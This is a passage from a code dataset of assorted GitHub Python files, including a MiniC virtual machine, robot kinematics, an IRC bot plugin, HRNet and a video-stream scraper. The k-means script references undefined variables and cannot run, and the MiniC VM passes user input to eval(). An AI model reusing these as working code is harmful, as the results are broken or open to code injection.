-> None:\n self.backbone.training_epoch_end(outputs)\n\n def validation_epoch_end(self, outputs) -> None:\n self.backbone.validation_epoch_end(outputs)\n","repo_name":"Lightning-Universe/lightning-flash","sub_path":"src/flash/core/integrations/pytorch_forecasting/adapter.py","file_name":"adapter.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","stars":1717,"dataset":"github-code","pt":"7"} +{"seq_id":"71570462623","text":"from enum import IntEnum\n\nfrom bs4 import BeautifulSoup\nfrom flask import url_for\n\nfrom app import format_datetime_short\n\nvalid_letter_jobs = [\n {\n 'service_name': {'name': 'test_name'},\n 'id': 'test_id',\n 'notification_count': 2,\n 'job_status': 'ready to send',\n 'created_at': '2017-04-01T12:00:00'\n },\n {\n 'service_name': {'name': 'test_name 2'},\n 'id': 'test_id 2',\n 'notification_count': 1,\n 'job_status': 'sent to dvla',\n 'created_at': '2017-04-02T13:00:00'\n },\n {\n 'service_name': {'name': 'test_name 3'},\n 'id': 'test_id 3',\n 'notification_count': 1,\n 'job_status': 'in progress',\n 'created_at': '2017-04-03T14:00:00'\n }\n]\n\nsend_letter_jobs_response = {\"response\": \"Task created to send files to DVLA\"}\n\n\nclass LetterJobsHeader(IntEnum):\n SERVICE_NAME = 0\n JOB_ID = 1\n NOTIFICATION_COUNT = 2\n JOB_STATUS = 3\n CREATED_AT = 4\n CHECKBOX = 5\n TEMP_STATUS = 6\n\n\ndef test_get_letter_jobs_returns_list_of_all_letter_jobs(logged_in_platform_admin_client, mocker):\n mock_get_letters = mocker.patch('app.letter_jobs_client.get_letter_jobs', return_value=valid_letter_jobs)\n\n response = logged_in_platform_admin_client.get(url_for('main.letter_jobs'))\n\n assert mock_get_letters.called\n assert response.status_code == 200\n\n page = BeautifulSoup(response.data.decode('utf-8'), 'html.parser')\n assert page.h1.string == 'Letter jobs'\n\n rows = page.select('table tbody tr')\n\n assert len(rows) == len(valid_letter_jobs)\n\n for row_pos in range(len(rows)):\n cols = rows[row_pos].find_all('td')\n assert valid_letter_jobs[row_pos]['service_name']['name'] == cols[LetterJobsHeader.SERVICE_NAME].text\n assert valid_letter_jobs[row_pos]['id'] == cols[LetterJobsHeader.JOB_ID].text\n assert valid_letter_jobs[row_pos]['notification_count'] == int(cols[LetterJobsHeader.NOTIFICATION_COUNT].text)\n assert valid_letter_jobs[row_pos]['job_status'] == cols[LetterJobsHeader.JOB_STATUS].text\n assert format_datetime_short(\n valid_letter_jobs[row_pos]['created_at']) == cols[LetterJobsHeader.CREATED_AT].text\n if not (valid_letter_jobs[row_pos]['job_status'] == 'ready to send' or\n valid_letter_jobs[row_pos]['job_status'] == 'sent to dvla'):\n assert 'disabled' in str(cols[LetterJobsHeader.CHECKBOX])\n\n\ndef test_post_letter_jobs_select_1_letter_job_submits_1_job(logged_in_platform_admin_client, mocker):\n letter_jobs_first_selected = {'job_id': ['test_id']}\n\n mock_get_letters = mocker.patch('app.letter_jobs_client.get_letter_jobs', return_value=valid_letter_jobs)\n mock_send_letters = mocker.patch('app.letter_jobs_client.send_letter_jobs', return_value=send_letter_jobs_response)\n\n response = logged_in_platform_admin_client.post(url_for('main.letter_jobs'), data=letter_jobs_first_selected,\n follow_redirects=True)\n\n assert mock_get_letters.called\n assert mock_send_letters.called\n assert response.status_code == 200\n\n page = BeautifulSoup(response.data.decode('utf-8'), 'html.parser')\n\n rows = page.select('table tbody tr')\n\n assert len(rows) == len(valid_letter_jobs)\n\n colr0 = rows[0].find_all('td')\n colr1 = rows[1].find_all('td')\n colr2 = rows[2].find_all('td')\n\n assert colr0[LetterJobsHeader.TEMP_STATUS].text == \"sending\"\n assert colr1[LetterJobsHeader.TEMP_STATUS].text == \"\"\n assert colr2[LetterJobsHeader.TEMP_STATUS].text == \"\"\n\n message = page.find('p', attrs={'id': 'message'}).text\n assert \"Task created to send files to DVLA\" in message\n\n\ndef test_post_letter_jobs_none_selected_shows_message(logged_in_platform_admin_client, mocker):\n mock_get_letters = mocker.patch('app.letter_jobs_client.get_letter_jobs', return_value=valid_letter_jobs)\n mock_send_letters = mocker.patch('app.letter_jobs_client.send_letter_jobs', return_value=send_letter_jobs_response)\n\n response = logged_in_platform_admin_client.post(url_for('main.letter_jobs'), data={}, follow_redirects=True)\n\n assert mock_get_letters.called\n assert not mock_send_letters.called\n assert response.status_code == 200\n\n page = BeautifulSoup(response.data.decode('utf-8'), 'html.parser')\n message = page.find('p', attrs={'id': 'message'}).text\n\n assert \"No jobs selected\" in message\n","repo_name":"govau/notify","sub_path":"admin/tests/app/main/views/test_letter_jobs.py","file_name":"test_letter_jobs.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"7"} +{"seq_id":"20413080272","text":"from semantic import Pro\nimport os\n\ndef find_value(name):\n value = 0\n if name in p.temp_list:\n for i, t in enumerate(p.temp_list):\n if t.name == str(name):\n value = t.value\n elif name in p.chart:\n value = p.chart[name]\n else:\n value = int(name)\n return value\n\n\ndef _op(op, P1, P2):\n p1 = find_value(P1)\n p2 = find_value(P2)\n\n if op == '+':\n return p1 + p2\n elif op == '-':\n return p1 - p2\n elif op == '*':\n return p1 * p2\n elif op == '/':\n return p1 // p2\n elif op == '>':\n if p1 > p2:\n return 1\n return 0\n elif op == '<':\n if p1 < p2:\n return 1\n return 0\n elif op == '==':\n if p1 == p2:\n return 1\n return 0\n elif op == '>=':\n if p1 >= p2:\n return 1\n return 0\n elif op == '<=':\n if p1 <= p2:\n return 1\n return 0\n elif op == '!=':\n if p1 != p2:\n return 1\n return 0\n elif op == '&&':\n if p1 == 1 and p2 == 1:\n return 1\n return 0\n elif op == '||':\n if p1 == 0 and p2 == 0:\n return 0\n return 1 \n\n\ndef VM(chart,newT,sequence,seq_index):\n\n if os.path.exists('Result.txt'):\n os.remove('Result.txt')\n\n\n\n global p\n p = Pro()\n p.chart = chart # 符号表 类型:dict\n p.temp_list = newT # 临时变量表 类型:NewT\n p.seq_list = sequence # 四元式表 类型:Sequence\n p.seq_index=seq_index #主函数四元式开始的位置\n # 测试使用,将符号表与临时变量表的value置为0\n for i in p.chart.keys():\n p.chart[i] = 0\n for i in range(p.temp_list.__len__()):\n p.temp_list[i].value = 0\n\n print('-------------------------------------')\n #index = 3\n #print(seq_index)\n index=int(p.seq_index)\n while index < len(p.seq_list):\n item = p.seq_list[int(index)]\n if item.action == '=':\n index += 1\n if item.p1 in p.temp_list:\n for i, t in enumerate(p.temp_list):\n if t.name == str(item.p1):\n p.chart[item.result] = p.temp_list[i].value\n else:\n p.chart[item.result] = item.p1\n elif item.action == 'j=':\n flag = find_value(item.p2)\n if flag == item.p1:\n index = item.result.value\n else:\n index += 1\n elif item.action == 'j':\n index = item.result.value\n elif item.action == 'out':\n index += 1\n t = find_value(item.p1)\n with open('Result.txt', 'a+') as f:\n print('输出:', t)\n f.write('{:2}\\n'.format(t))\n elif item.action == 'in':\n index += 1\n if item.p1 in p.chart:\n t = eval(input('输入:'))\n p.chart[item.p1] = t\n else:\n print(\"变量未定义\")\n else:\n index += 1\n if item.result in p.chart:\n p.chart[item.result] = _op(item.action, item.p1, item.p2)\n elif item.result in p.temp_list:\n for i,t in enumerate(p.temp_list):\n if t.name == str(item.result):\n p.temp_list[i].value = _op(item.action, item.p1, item.p2)\n\n # print('将抽象机结果赋给了符号表与临时变量表')\n print(p.chart)\n print(p.temp_list)\n #对符号表进行管理,重新赋值\n if os.path.exists('Parameters.txt'):\n os.remove('Parameters.txt')\n with open('Parameters.txt','a+') as f:\n for i in p.chart.keys():\n f.write('name:{:2} value:{}\\n'.format(i,p.chart.get(i)))\n for i in p.temp_list:\n f.write('name:{:2} value:{}\\n'.format(i.name,i.value))\n\nif __name__ == '__main__':\n VM()","repo_name":"pickxiguapi/MiniC-Compiler","sub_path":"vm.py","file_name":"vm.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"7"} +{"seq_id":"35105284708","text":"\n # Basic - Print all integers from 0 to 150.\ndef all ():\n for x in range (0,151,1):\n print(x)\nall()\n\n\n# Multiples of Five - Print all the multiples of 5 from 5 to 1,000\ndef multiples ():\n for x in range (0,1001,5):\n if x % 5 == 0:\n print(x)\n# multiples()\n\n\n# Counting, the Dojo Way - Print integers 1 to 100. If divisible by 5, print \"Coding\" instead. If divisible by 10, print \"Coding Dojo\".\n\ndef divisible ():\n for x in range (1,101,1):\n if x % 5 == 0:\n print(\"Coding\")\n if x % 10 == 0:\n print(\"Coding Dojo\")\n else:\n print(x)\n# divisible()\n\n\n# Whoa. That Sucker's Huge - Add odd integers from 0 to 500,000, and print the final sum.\ndef odd ():\n for x in range(0,500):\n if x % 2 == 1:\n print(x)\n\n # Countdown by Fours - Print positive numbers starting at 2018, counting down by fours\ndef positive ():\n for x in range(2018,0,-4):\n print(x)\n # Flexible Counter - Set three variables: lowNum, highNum, mult. Starting at lowNum and going through highNum, print only the integers that are a multiple of mult. For example, if lowNum=2, highNum=9, and mult=3, the loop should print 3, 6, 9 (on successive lines) \nlownum=2\nhighnum=10\nmult=3\n\nfor x in range(lownum,highnum):\n if x % 3 == 0:\n print (x)\n ","repo_name":"bintad/hellopython","sub_path":"for_loop_basic1.py","file_name":"for_loop_basic1.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22434219935","text":"from modern_robotics import core\nimport numpy as np\nfrom numpy import cos, sin\nfrom math import pi\nimport csv\n\n\n\"\"\"\nCode for Milestone 1: Next State.\nIn this code I wrote a function NextState to simulate the kinematics of the youBot.\nThis function compute the configuration of the robot in the next time step.\nThe next step is saved in an csv file 'next_state.csv'.\n\"\"\"\n\n\ndef NextState(current_config, speeds, delta_t, max_ang_speed):\n \"\"\" This function compute the configuration of the robot in the next time step.\n\n The function NextState is based on a simple first-order Euler step, i.e.:\n - new arm joint angles = (old arm joint angles) + (joint speeds) * Δt\t\t(Equation 1)\n - new wheel angles = (old wheel angles) + (wheel speeds) * Δt\t\t\t\t(Equation 2)\n - new chassis configuration is obtained from odometry (as described in Chapter 13.4)\n\n Input:\n current_config - A 12-vector representing the current configuration of the robot (3 variables for\n the chassis configuration, 5 variables for the arm configuration, and 4 variables\n for the wheel angles).\n speeds - A 9-vector of controls indicating the arm joint speeds theta_dot (5 variables) and the\n wheel speeds u (4 variables).\n delta_t - The time step Δt.\n max_ang_speed - A positive real value indicating the maximum angular speed of the arm joints and\n the wheels.\n\n Return: \n new_config - A 12-vector representing the configuration of the robot time Δt later.\n \"\"\"\n # Initialize variables:\n # The forward-backward distance between the wheels to frame {b} [m]\n l = 0.47/2\n w = 0.3/2\t\t\t# The side-to-side distance between the wheels to frame {b} [m]\n r = 0.0475\t\t\t# The radius of each wheel [m]\n\n # Get current chassis configuration, arm configuration (joints angles) and wheel angles:\n current_q = current_config[:3]\n current_joint_ang = current_config[3:8]\n current_wheel_ang = current_config[8:12]\n\n # Restrict the speeds executed by the wheels and joints to the maximum speed:\n for i in range(len(speeds)):\n abs_speed = abs(speeds[i])\n if abs_speed > max_ang_speed:\n speeds[i] = speeds[i]/abs_speed * max_ang_speed\n\n # Get current arm joint speeds and wheel speeds (with restricted speeds):\n theta_dot = speeds[:5]\n u = speeds[5:]\n\n # Calculate new arm joint angles and wheel angles (according to equations 1,2):\n new_joint_ang = current_joint_ang + theta_dot * delta_t\n new_wheel_ang = current_wheel_ang + u * delta_t\n\n # Calculate new chasis configuration (according to Chapter 13.4):\n F = r/4 * np.array([[-1/(l + w), 1/(l + w), 1/(l + w), -1/(l + w)],\n [1, 1, 1, 1],\n [-1, 1, -1, 1]])\n Vb = F.dot((u * delta_t).T).T\n w_bz, v_bx, v_by = Vb\n\n if w_bz == 0.:\n delta_qb = np.array([0, v_bx, v_by]).T\n else:\n delta_qb = np.array([w_bz, (v_bx * sin(w_bz) + v_by * (cos(w_bz) - 1))/w_bz,\n (v_by * sin(w_bz) + v_bx * (1 - cos(w_bz)))/w_bz])\n\n # Transforming the ∆q b in {b} to ∆q in the fixed frame {s} using the chassis angle:\n chassis_angle = current_config[0]\n Tsb = np.array([[1, 0,\t\t\t\t\t 0],\n [0, cos(chassis_angle), -sin(chassis_angle)],\n [0, sin(chassis_angle), cos(chassis_angle)]])\n delta_q = Tsb.dot(delta_qb.T)\n\n # Calculating new chasis configuration:\n new_q = current_q + delta_q\n\n # Combining the three vectors to the new configuration vector:\n new_config = np.concatenate(\n (new_q, new_joint_ang, new_wheel_ang), axis=None)\n\n return new_config\n\n\n########## Testing the NextState Function ##########\n\n# Initialize variables:\n# The initial configuration of the youBot(3 chassis configuration variables, 5 arm joint angles, 4 wheel angles, and \"0\" for \"gripper open\"):\ncurrent_config = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n\n# The speeds vector (arm joint speeds = (0, 0, 0, 0, 0), wheel speeds = (-10, 10, -10, 10)):\n# The robot chassis should slide sideways in the y_b direction\nspeeds = np.array([0, 0, 0, 0, 0, -10, 10, -10, 10])\n\n# Restrictions on the speeds vector:\nmax_ang_speed = 5\n\n# Time variables:\ndelta_t = 0.01\t\t\t\t\t\t# Time step [sec]\nt_total = 1\t\t\t\t\t\t\t# Simulation run time [sec]\niteration = int(t_total/delta_t) # Number of iterations\n\n# Initialize configuration array (with current_config as the first raw):\nconfig_array = np.zeros((iteration, 13))\nconfig_array[0] = current_config\n\n# Calculate the new configuration for every iteration:\nfor i in range(1, iteration):\n current_config = NextState(current_config, speeds, delta_t, max_ang_speed)\n config_array[i][:12] = current_config\n\n# Save the 13-segment of new configurations as a csv file:\nwith open(\"next_state.csv\", \"w+\") as my_csv:\n csvWriter = csv.writer(my_csv, delimiter=',')\n csvWriter.writerows(config_array)\n","repo_name":"YaelBenShalom/Mobile-Manipulation","sub_path":"code/Next_State.py","file_name":"Next_State.py","file_ext":"py","file_size_in_byte":5099,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"7"} +{"seq_id":"21915119790","text":"\nfrom sklearn import cluster as c\nimport numpy as np\nimport pandas as pd\nimport csv\nfrom collections import Counter\n\ndf = pd.read_csv('vectors.csv')\nkmeans = c.KMeans(n_clusters=10, random_state=0).fit(df)\nprint(\"cluster created\")\nReviews = df.values\nfor i in range(len(labels)):\n print(1)\n clusters[labels[i]].append(Reviews[i])\n\nf= open('Top5_Cluster.txt',\"w+\")\nfor i in range(len(clusters)):\n print(\"for cluster \"+str(i))\n file1.write(\"for cluster \"+str(i))\n cluster=pd.DataFrame(clusters[i])\n cluster.columns=columns\n sum={}\n for i in columns:\n sum[i]=cluster[i].sum()\n sorted_labels = sorted(sum.items(), key=operator.itemgetter(1), reverse=True)\n print(str(sorted_x))\n for i in range(5):\n print(sorted_labels[i])\n file1.write(str(sorted_labels[i]))\n file1.write('\\n')\n","repo_name":"RashmiShivanna/FineFoods_Review","sub_path":"kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17417321521","text":"# -*- coding: utf8 -*-\n\"\"\"\n==============================================\n:mod:`onebot.plugins.users` Users plugin\n==============================================\n\nKeeps track of the users in channels. Also provides an authorisation system.\nThis plugin uses WHOIS to figure out someones NickServ account and then links\nthat to an automatically created, in-bot account.\n\"\"\"\nfrom __future__ import unicode_literals, print_function\n\nimport ast\nimport asyncio\nimport re\nfrom typing import Any, Dict, List, Optional, Set\n\nimport irc3\nfrom irc3.plugins.storage import Storage\nfrom irc3.utils import IrcString\n\n\nclass User(object):\n \"\"\"User object\"\"\"\n\n def __init__(self, mask, channels: List[str], id_, database=None):\n self.nick = mask.nick\n self.host = mask.host\n self.channels: Set[str] = set()\n self.id = id_\n self.database: Optional[Storage] = database\n try:\n if isinstance(channels, str):\n raise ValueError(\"You must specify a list of channels!\")\n for c in iter(channels):\n self.channels.add(c)\n except TypeError:\n raise ValueError(\"You need to specify in which channel this \" \"user is!\")\n\n @property\n def mask(self) -> IrcString:\n \"\"\"Get the mask of this user\"\"\"\n return IrcString(\"{}!{}\".format(self.nick, self.host))\n\n def _get_database(self) -> Storage:\n if self.database is None:\n raise Exception(\"No database set for this user.\")\n return self.database\n\n def set_settings(self, settings):\n \"\"\"Replaces the settings with the provided dictionary\"\"\"\n\n async def wrapper():\n id_ = await self.id()\n self._get_database()[id_] = settings\n\n asyncio.ensure_future(wrapper())\n\n def set_setting(self, setting: str, value: Any):\n \"\"\"Set a specified setting to a value\"\"\"\n print(\"Trying to set %s to %s\" % (setting, value))\n\n async def wrapper():\n id_ = await self.id()\n self._get_database().set(id_, **{setting: value})\n\n asyncio.ensure_future(wrapper())\n\n async def get_settings(self) -> Dict[str, Any]:\n \"\"\"Get this users settings\"\"\"\n id_ = await self.id()\n return self._get_database().get(id_, dict())\n\n async def get_setting(self, setting, default=None) -> Any:\n \"\"\"Gets a setting for the users. Can be any type.\"\"\"\n settings = await self.get_settings()\n result = settings.get(setting, default)\n if isinstance(result, str):\n try:\n parsed = ast.literal_eval(result)\n return parsed\n except (ValueError, SyntaxError):\n pass\n\n return result\n\n def join(self, channel) -> None:\n \"\"\"Register that the user joined a channel\"\"\"\n self.channels.add(channel)\n\n def part(self, channel) -> None:\n \"\"\"Register that the user parted a channel\"\"\"\n self.channels.remove(channel)\n\n def still_in_channels(self) -> bool:\n \"\"\"Is the user still in channels?\"\"\"\n return len(self.channels) > 0\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Compare users by nick\n\n Since nicks are unique this works for exactly one irc server.\n \"\"\"\n if not isinstance(other, self.__class__):\n return False\n return self.nick == other.nick\n\n\n@irc3.plugin\nclass UsersPlugin(object):\n \"\"\"User management plugin for OneBot\n\n Doesn't do anything with NAMES because we can't get hosts through\n NAMES\n\n Configuration settings:\n - ``identify_by``: the identification method\n\n Identification methods available:\n - ``mask``: Use the hostmask\n - ``whatcd``: Get the what.cd username from the host mask\n - ``nickserv``: Parse nickserv info from ``WHOIS``.\n \"\"\"\n\n requires = [\"irc3.plugins.storage\", \"irc3.plugins.asynchronious\"]\n\n def __init__(self, bot: irc3.IrcBot):\n \"\"\"Initialises the plugin\"\"\"\n self.bot = bot\n config = bot.config.get(__name__, {})\n self.identifying_method = config.get(\"identify_by\", \"mask\")\n self.log = bot.log.getChild(__name__)\n self.connection_lost()\n\n @irc3.extend\n def get_user(self, nick):\n user = self.active_users.get(nick)\n if not user:\n self.log.warning(\"Couldn't find %s!\", nick)\n return user\n\n @irc3.event(irc3.rfc.JOIN_PART_QUIT)\n def on_join_part_quit(self, mask=None, **kwargs):\n event = kwargs[\"event\"]\n self.log.debug(\"%s %sed\", mask.nick, event.lower())\n getattr(self, event.lower())(mask.nick, mask, **kwargs)\n\n @irc3.event(irc3.rfc.KICK)\n def on_kick(self, mask=None, target=None, **kwargs):\n self.log.debug(\"%s kicked %s\", mask.nick, target.nick)\n self.part(target.nick, target, **kwargs)\n\n @irc3.event(irc3.rfc.NEW_NICK)\n def on_new_nick(self, nick=None, new_nick=None, **kwargs):\n self.log.debug(\"%s renamed to %s\", nick.nick, new_nick)\n if nick.nick in self.active_users:\n user = self.active_users[nick.nick]\n user.nick = new_nick\n del self.active_users[nick.nick]\n self.active_users[new_nick] = user\n\n @irc3.event(irc3.rfc.PRIVMSG)\n def on_privmsg(self, mask=None, event=None, target=None, data=None):\n if target not in self.channels:\n return\n if mask.nick not in self.active_users:\n self.log.debug(\"Found user %s via PRIVMSG\", mask.nick)\n self.active_users[mask.nick] = self.create_user(mask, [target])\n else:\n self.active_users[mask.nick].join(target)\n\n def connection_lost(self):\n self.channels = set()\n self.active_users = dict()\n\n def join(self, nick, mask, channel=None, **kwargs):\n self.log.debug(\"%s joined channel %s\", nick, channel)\n # This can only be observed if we're in that channel\n self.channels.add(channel)\n if nick == self.bot.nick:\n self.bot.send(\"WHO {}\".format(channel))\n\n if nick not in self.active_users:\n self.active_users[nick] = self.create_user(mask, [channel])\n\n self.active_users[nick].join(channel)\n\n def quit(self, nick, _mask, **kwargs):\n if nick == self.bot.nick:\n self.connection_lost()\n\n if nick in self.active_users:\n del self.active_users[nick]\n\n def part(self, nick, mask, channel=None, **kwargs):\n if nick == self.bot.nick:\n self.log.info(\"%s left %s by %s\", nick, channel, kwargs[\"event\"])\n for n, user in self.active_users.copy().items():\n user.part(channel)\n if not user.still_in_channels():\n del self.active_users[n]\n # Remove channel from administration\n self.channels.remove(channel)\n\n if nick not in self.active_users:\n return\n\n self.active_users[nick].part(channel)\n if not self.active_users[nick].still_in_channels():\n self.log.debug(\"Lost %s out of sight\", mask.nick)\n del self.active_users[nick]\n\n @irc3.event(irc3.rfc.RPL_WHOREPLY)\n def on_who(\n self, channel=None, nick=None, username=None, host=None, server=None, **kwargs\n ):\n \"\"\"Process a WHO reply since it could contain new information.\n\n Should only be processed for channels we are currently in!\n \"\"\"\n if channel not in self.channels:\n self.log.debug(\n \"Got WHO for channel I'm not in: {chan}\".format(chan=channel)\n )\n return\n\n self.log.debug(\"Got WHO for %s: %s (%s)\", channel, nick, host)\n\n if nick not in self.active_users:\n mask = IrcString(\"{}!{}@{}\".format(nick, username, host))\n self.active_users[nick] = self.create_user(mask, [channel])\n else:\n self.active_users[nick].join(channel)\n\n def create_user(self, mask, channels):\n \"\"\"Return a User object\"\"\"\n if self.identifying_method == \"mask\":\n\n async def id_func():\n return mask.host\n\n return User(mask, channels, id_func, self.bot.db)\n if self.identifying_method == \"nickserv\":\n\n async def get_account():\n user = self.get_user(mask.nick)\n if hasattr(user, \"account\"):\n return user.account\n result = await self.bot.async_cmds.whois(mask.nick)\n if result[\"success\"] and \"account\" in result:\n user.account = str(result[\"account\"])\n return user.account\n else:\n return mask.host\n\n return User(mask, channels, get_account, self.bot.db)\n if self.identifying_method == \"whatcd\":\n\n async def id_func():\n match = re.match(r\"^\\d+@(.*)\\.\\w+\\.what\\.cd\", mask.host.lower())\n if match:\n return match.group(1)\n else:\n self.log.debug(\n \"Failed to extract what.cd user name\"\n \"from {mask}\".format(mask=mask)\n )\n return mask.host\n\n return User(mask, channels, id_func, self.bot.db)\n else: # pragma: no cover\n raise ValueError(\"A valid identifying method should be configured\")\n\n @classmethod\n def reload(cls, old): # pragma: no cover\n users = old.active_users\n newinstance = cls(old.bot)\n for user in users.values():\n user.database = newinstance.bot.db\n newinstance.channels = old.channels\n newinstance.users = users\n","repo_name":"thomwiggers/onebot","sub_path":"onebot/plugins/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":9692,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"7"} +{"seq_id":"38783883772","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nclass Tag:\n '''Class returns HTML for accepted tag and params of tag'''\n \n def __init__(self, tag, toplevel=False, is_single=False):\n '''Inits the instance.\n tag - str with accepted HTML tag\n attributes - dict for build attributes of HTML tag\n chldren - list of children tags'''\n self.tag = tag\n self.text = \"\"\n self.attributes = {}\n\n self.toplevel = toplevel\n self.is_single = is_single\n self.children = []\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, value, traceback):\n if self.toplevel:\n print(\"<%s>\" % self.tag)\n for child in self.children:\n print(child)\n\n print(\"\" % self.tag)\n\n def __str__(self):\n attrs = []\n for attribute, value in self.attributes.items():\n attrs.append('%s=\"%s\"' % (attribute, value))\n attrs = \" \".join(attrs)\n\n if self.children:\n opening = \"<{tag} {attrs}>\".format(tag=self.tag, attrs=attrs)\n internal = \"%s\" % self.text\n# print(str(self.children))\n for child in self.children:\n internal += str(child)\n ending = \"\" % self.tag\n return opening + internal + ending\n else:\n if self.is_single:\n return \"<{tag} {attrs}/>\".format(tag=self.tag, attrs=attrs)\n\n else:\n return \"<{tag} {attrs}>{text}\".format(\n tag=self.tag, attrs=attrs, text=self.text\n )\n \nif __name__ == \"__main__\":\n with Tag(\"body\", toplevel=True) as body:\n with Tag(\"div\") as div:\n with Tag(\"p\") as paragraph:\n paragraph.text = \"Какой-то текст\"\n div.children.append(paragraph)\n body.children.append(div)\n \n ","repo_name":"McSim85/skillfactory_web","sub_path":"B3/B3.11-with/with-example.py","file_name":"with-example.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"72865118622","text":"from __future__ import division\nfrom __future__ import print_function\n\nimport torch\nimport torch.nn as nn\nimport torch._utils\nimport torch.nn.functional as F\n\nfrom .segbase import SegBaseModel\nfrom .model_zoo import MODEL_REGISTRY\nfrom ..config import cfg\n\n\n@MODEL_REGISTRY.register(name='HRNet')\nclass HighResolutionNet(SegBaseModel):\n def __init__(self):\n super(HighResolutionNet, self).__init__()\n self.hrnet_head = _HRNetHead(self.nclass, self.encoder.last_inp_channels)\n self.__setattr__('decoder', ['hrnet_head'])\n\n def forward(self, x):\n shape = x.shape[2:]\n x = self.encoder(x)\n x = self.hrnet_head(x)\n x = F.interpolate(x, size=shape, mode='bilinear', align_corners=False)\n return [x]\n\n\nclass _HRNetHead(nn.Module):\n def __init__(self, nclass, last_inp_channels, norm_layer=nn.BatchNorm2d):\n super(_HRNetHead, self).__init__()\n\n self.last_layer = nn.Sequential(\n nn.Conv2d(\n in_channels=last_inp_channels,\n out_channels=last_inp_channels,\n kernel_size=1,\n stride=1,\n padding=0),\n\n norm_layer(last_inp_channels),\n nn.ReLU(inplace=False),\n nn.Conv2d(\n in_channels=last_inp_channels,\n out_channels=nclass,\n kernel_size=cfg.MODEL.HRNET.FINAL_CONV_KERNEL,\n stride=1,\n padding=1 if cfg.MODEL.HRNET.FINAL_CONV_KERNEL == 3 else 0)\n )\n\n def forward(self, x):\n # Upsampling\n x0_h, x0_w = x[0].size(2), x[0].size(3)\n x1 = F.interpolate(x[1], size=(x0_h, x0_w), mode='bilinear', align_corners=False)\n x2 = F.interpolate(x[2], size=(x0_h, x0_w), mode='bilinear', align_corners=False)\n x3 = F.interpolate(x[3], size=(x0_h, x0_w), mode='bilinear', align_corners=False)\n\n x = torch.cat([x[0], x1, x2, x3], 1)\n x = self.last_layer(x)\n return x\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"PyTorch/contrib/cv/semantic_segmentation/FastSCNN/segmentron/models/hrnet_seg.py","file_name":"hrnet_seg.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"35075151233","text":"from __future__ import unicode_literals\nfrom datetime import datetime\nimport io\nimport json\nimport logging\nimport os\nimport requests\nfrom retrying import retry\nimport time\nimport urllib\n\nfrom bs4 import BeautifulSoup\nimport ffmpy\nimport m3u8\nimport numpy as np\nfrom PIL import Image\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.chrome.options import Options\nfrom youtube_dl import YoutubeDL\n\nimport eta.core.image as etai\nimport eta.core.serial as etas\nimport eta.core.utils as etau\n\nimport pandemic51.config as panc\nfrom pandemic51.core.database import add_stream_history\n\n\nlogger = logging.getLogger(__name__)\n\n\nCHUNK_URL_MAX_NUM_ATTEMPTS = 20\nCHUNK_URL_SLEEP_SECONDS = 1\n\n\ndef get_img_urls(webpage):\n '''Open the webpage and parse the source HTML for any image urls.\n\n Args:\n webpage: The webpage to scrape for image urls\n\n Returns:\n urls: List of url strings for all images in the webpage\n '''\n # Get the source from the page\n driver = _configure_webdriver()\n driver.get(webpage)\n\n # Ensure that all images have had time to load\n time.sleep(1)\n\n # Parse the source HTML for images with PSLNM in the title\n soup = BeautifulSoup(driver.page_source, 'html.parser')\n driver.service.stop()\n img_tags = soup.find_all('img')\n urls = [img['src'] for img in img_tags]\n return urls\n\n\ndef save_video(chunk_path, uri, output_dir):\n '''Saves the video at the given URI to the given output directory.\n\n Args:\n chunk_path: the URL path for the chunklist\n uri: the video URI\n output_dir: the output directory\n\n Returns:\n the output video path\n '''\n base_path = os.path.split(chunk_path)[0]\n input_video = os.path.join(base_path, uri)\n if \"earthcam\" in chunk_path:\n res = requests.get(\n input_video,\n headers={\n \"Host\": \"https://www.earthcam.com\",\n \"Referrer\": \"https://www.earthcam.com/\"\n }\n )\n input_video = \"./temp.ts\"\n with open(input_video, \"wb\") as ff:\n ff.write(res.content)\n\n out_name = os.path.splitext(uri)[0] + \".mp4\"\n output_video_path = os.path.join(output_dir, out_name)\n\n etau.ensure_basedir(output_video_path)\n ffmpy.FFmpeg(\n inputs={input_video: None},\n outputs={output_video_path: None},\n ).run()\n\n return output_video_path\n\n\ndef sample_first_frame(inpath, outpath):\n '''Samples the first frame of the given video.\n\n Args:\n inpath: input video path\n outpath: the path to write the output image\n\n Returns:\n True if the image was created, or False if it already existed\n '''\n if os.path.exists(outpath):\n return False\n\n outcmd = \"-ss 00:00:00 -t 00:00:01 -r 1 -f image2\"\n\n etau.ensure_basedir(outpath)\n ffmpy.FFmpeg(\n inputs={inpath: None},\n outputs={outpath: outcmd},\n ).run()\n\n return True\n\n\nclass Stream(etas.Serializable):\n '''Abstract class for streams of various types providing functionality for\n downloading clips and images from the stream, getting the latest stream URL,\n etc.\n '''\n def __init__(self, stream_name, GMT):\n '''\n Args:\n stream_name: name of the stream (should match JSON file in\n {{pandemic51}}/config/streams/\n GMT: integer relative timezone of stream\n '''\n self.type = etau.get_class_name(self)\n self.stream_name = stream_name\n self.GMT = GMT\n\n @staticmethod\n def stream_path(stream_name):\n '''Get the path to the Stream JSON file.\n\n Args:\n stream_name: name of the 